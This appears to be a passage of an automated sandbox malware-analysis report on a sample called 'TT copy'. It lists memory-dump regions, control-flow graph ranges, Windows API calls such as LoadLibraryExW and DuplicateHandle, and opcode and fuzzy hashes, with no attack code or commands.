                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 297 e5c0c0-e5c154 DuplicateHandle 298 e5c156-e5c15c 297->298 299 e5c15d-e5c17a 297->299 298->299
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E5C147
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 302 e58b38-e59c50 304 e59c52-e59c55 302->304 305 e59c58-e59c87 LoadLibraryExW 302->305 304->305 306 e59c90-e59cad 305->306 307 e59c89-e59c8f 305->307 307->306
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E59A69,00000800,00000000,00000000), ref: 00E59C7A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 310 e59c09-e59c50 311 e59c52-e59c55 310->311 312 e59c58-e59c87 LoadLibraryExW 310->312 311->312 313 e59c90-e59cad 312->313 314 e59c89-e59c8f 312->314 314->313
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E59A69,00000800,00000000,00000000), ref: 00E59C7A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 317 e59988-e599c8 318 e599d0-e599fb GetModuleHandleW 317->318 319 e599ca-e599cd 317->319 320 e59a04-e59a18 318->320 321 e599fd-e59a03 318->321 319->318 321->320
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E599EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 323 6ee0594-6ee05ab 325 6ee05b7-6ee05be 323->325
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: )
                                                                                                            • API String ID: 0-2427484129
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 22e4bb7e1990b5c52743b833eac58f7838882fc5be46fd40825b5ee21a4fbf28
                                                                                                            • Instruction ID: c5fdc3b1820005c8ed214e862479aafd54dde771db219560d9b903f35cf9c5aa
                                                                                                            • Opcode Fuzzy Hash: 22e4bb7e1990b5c52743b833eac58f7838882fc5be46fd40825b5ee21a4fbf28
                                                                                                            • Instruction Fuzzy Hash: D011C275E003065F8FA5DB799C545FFBBFAEFC81207155929E429D7280EF309A0687A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6ab9a6f4d5dbe3e73ad11797587721724556d2c253351b5d892ba10330e66c2e
                                                                                                            • Instruction ID: bef085faee373bf84e7342673d3d0c31eeaeb70a4cb5ce561ecb5febfddaae28
                                                                                                            • Opcode Fuzzy Hash: 6ab9a6f4d5dbe3e73ad11797587721724556d2c253351b5d892ba10330e66c2e
                                                                                                            • Instruction Fuzzy Hash: C5018BB5A103064F8BA5DB799C445FFB6FAEFC82207245929E429D7280EB309A068760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1f5fd62ebf26861724eb8a154bb1f885e767c739d912c1571d55ee950609830b
                                                                                                            • Instruction ID: 2e3d692a5ab171978358e387355d174fe09bc1c387ad8fe36bc272c365f8c560
                                                                                                            • Opcode Fuzzy Hash: 1f5fd62ebf26861724eb8a154bb1f885e767c739d912c1571d55ee950609830b
                                                                                                            • Instruction Fuzzy Hash: 43214D34A05319CFDB64DF58D880BEE73F6EB45300F1095A5D61AAB784DB305E858F60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d71347917f9fa24439550dac80ce601b4810dce010a8d40f7a198472651a757a
                                                                                                            • Instruction ID: 17856bad59a6aa35dc31a1efeb49ca88d2d57d127f34ca47a9784064048e5089
                                                                                                            • Opcode Fuzzy Hash: d71347917f9fa24439550dac80ce601b4810dce010a8d40f7a198472651a757a
                                                                                                            • Instruction Fuzzy Hash: 5E21D034A063188FDBA0EF68D894B9977F6EB8A304F009195D60EA7394DA305E858F60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fc2653dcf3b6ff57bd8988bf3fa2d1f98bad722ffe39532e0a92ea2ece85e197
                                                                                                            • Instruction ID: 5d5912551a34e9dc207cd9f62d57bb65b3c4305089c6824273e7f22f92c26f6c
                                                                                                            • Opcode Fuzzy Hash: fc2653dcf3b6ff57bd8988bf3fa2d1f98bad722ffe39532e0a92ea2ece85e197
                                                                                                            • Instruction Fuzzy Hash: 37F0F43140B389EEC7929A709C01DEB3F6E9F16204B1476AAE04393202D6214B0487F9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2d2556a774c289d148e0b63514f5f0aef7434dddc416b067c0407520e53c14d4
                                                                                                            • Instruction ID: b5c1746bf3e62cdb1bf8c285001528ac970c4aa7cbb5edfbce983f5da9be9e90
                                                                                                            • Opcode Fuzzy Hash: 2d2556a774c289d148e0b63514f5f0aef7434dddc416b067c0407520e53c14d4
                                                                                                            • Instruction Fuzzy Hash: 6AF090767042A42F931496B9EC40CABBBDDEBCA6703058166F518C7351D9309D04C6B1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 27d25f1661ed216c2a85306ac3dbe6af17520e76d0dd5609ce7fb57e3c38b40b
                                                                                                            • Instruction ID: f4b0c82123a3ea048f02c9e0eb45a20da45091a53d89b63716c5e57fcb21522f
                                                                                                            • Opcode Fuzzy Hash: 27d25f1661ed216c2a85306ac3dbe6af17520e76d0dd5609ce7fb57e3c38b40b
                                                                                                            • Instruction Fuzzy Hash: F4011A70D00259DFEB14CFA9C4083EEBBF2BF48324F24A629E425AA1A0D3744A40CBD0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5b86d59308fdd4e49dfc83d276ecd4c9c9859da5fc85f328ad7d387cb1944556
                                                                                                            • Instruction ID: 401f7ef86ee4dc6b1f0f6a1ef377416108fa85e2aae3712a0934930e333bfef0
                                                                                                            • Opcode Fuzzy Hash: 5b86d59308fdd4e49dfc83d276ecd4c9c9859da5fc85f328ad7d387cb1944556
                                                                                                            • Instruction Fuzzy Hash: 5901E871C00219DFDB54DFAAC4183EEBAF5BF48364F20A629E424AA290D7744A44CFD1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0b1c5c13b61347c7180805f7b22b0f5c72389bbbb9ec941360494a20083ba3d1
                                                                                                            • Instruction ID: 0580faad6f5dfb98e93890fc69239d8401402a1fe13d6a5a38c1b2672d141b76
                                                                                                            • Opcode Fuzzy Hash: 0b1c5c13b61347c7180805f7b22b0f5c72389bbbb9ec941360494a20083ba3d1
                                                                                                            • Instruction Fuzzy Hash: 2BF039767041246F5314DA6AEC88C6BBBEEEBCD6B4355817AF51CC7311DE309C0086A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4de12a05015765f2ea93949b2c2ee4f7a102968f28fb5bef5e6af4c9bdc61f4b
                                                                                                            • Instruction ID: 775e7c083ac004902a36e17e2cf5aa2266542d8a67be4373ad6fca78d518f34c
                                                                                                            • Opcode Fuzzy Hash: 4de12a05015765f2ea93949b2c2ee4f7a102968f28fb5bef5e6af4c9bdc61f4b
                                                                                                            • Instruction Fuzzy Hash: 81E06D767041246F5304DA6EDC84C6BBBEEEBCD6B4355817AF51CC7311DA309C00C6A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c55a2b07dd181dd2c870bbca4db2ffc4d398b1cf3895a49e91868b94d9c3da19
                                                                                                            • Instruction ID: 8d3c2408cd9551161e9aeb1ea8d4b991130b22890c2026ca7b43ecdb40dd4198
                                                                                                            • Opcode Fuzzy Hash: c55a2b07dd181dd2c870bbca4db2ffc4d398b1cf3895a49e91868b94d9c3da19
                                                                                                            • Instruction Fuzzy Hash: 61E0657180B308EFD791DAB1D4019EB3BAEEB06105B1031A7950797611EA314A449AFA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 44b5a12e9e9514d4c1b730a0ed129188a3401491e66430803751efdbd35718c9
                                                                                                            • Instruction ID: afcf2c9e996275236062cd16f344ca25e685996d7c98636708b6210e4971dad3
                                                                                                            • Opcode Fuzzy Hash: 44b5a12e9e9514d4c1b730a0ed129188a3401491e66430803751efdbd35718c9
                                                                                                            • Instruction Fuzzy Hash: 60F03034E05248EFC780DFA8E94569DBFB6EB49204F1482DAD808D7391DB359A15CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a18521c8aa67fab0e24909abb144cfe821f46c8ce1bba9d447efd115ef8db4c7
                                                                                                            • Instruction ID: 9fd5415f86c162443bfcfc5832d68e7332802c6a50316d741371450c1ef13581
                                                                                                            • Opcode Fuzzy Hash: a18521c8aa67fab0e24909abb144cfe821f46c8ce1bba9d447efd115ef8db4c7
                                                                                                            • Instruction Fuzzy Hash: E8F03934D14308EFCB54DFA4E44579DBBB1FB44304F1082A9D804A7350EB399A02DF80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bf843e32250082315213abb7ddb963e5a388eae1c631ad26b6134edde2188c45
                                                                                                            • Instruction ID: bf0dc4c3ea3e6a23bec2fa5d4a2b98313dede506e4618c9f02aba04eb587d3c8
                                                                                                            • Opcode Fuzzy Hash: bf843e32250082315213abb7ddb963e5a388eae1c631ad26b6134edde2188c45
                                                                                                            • Instruction Fuzzy Hash: B7E0C234D2520CEFCB94EFA8D845A9DBFB5FB48300F1091AAE91892310EB349A55DF81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4d496cb312eb90bba3e04470c73dd33ec0e74d1bcfd5b221d271d34c0964fd99
                                                                                                            • Instruction ID: 2f269fc94324e4bac7206af21e27f0e077701aab11c342585b233d0f32756284
                                                                                                            • Opcode Fuzzy Hash: 4d496cb312eb90bba3e04470c73dd33ec0e74d1bcfd5b221d271d34c0964fd99
                                                                                                            • Instruction Fuzzy Hash: 34F09274A05728CFEBA1DF64D8847D9B7B1BB09309F0054E5D04DAA260DB705ED4CF41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a96ad74c4e87cfab26122bbf43c98cf857a59319bacd780413c337e7df64f1c5
                                                                                                            • Instruction ID: 76924996a4a45a97dd14f08a4c6fce7dfdc09ec69bc8a74e8f3277bbf0a5db06
                                                                                                            • Opcode Fuzzy Hash: a96ad74c4e87cfab26122bbf43c98cf857a59319bacd780413c337e7df64f1c5
                                                                                                            • Instruction Fuzzy Hash: F3E01A70D1530CEFCB44DFA8D44569DBFF4AB49204F1091AA9818A3340E7341A45CF41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b3a5664b4cbaf728fe75ae0ec3692eecada3996505643a05a4b32ad6a35255d3
                                                                                                            • Instruction ID: 65424e0a9261addab3912ccc77bbf707eba41cd7e8baa360ce9f98ef00aa3b6b
                                                                                                            • Opcode Fuzzy Hash: b3a5664b4cbaf728fe75ae0ec3692eecada3996505643a05a4b32ad6a35255d3
                                                                                                            • Instruction Fuzzy Hash: CCE0C234E14208EFCB80DFA8D589A9DBBF4FB48314F1081AAE80897321E730AA00CF40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5459823691c02d0f075711e35eaeecf120df28cf1e8ef0e20548d4b5cf7b27c3
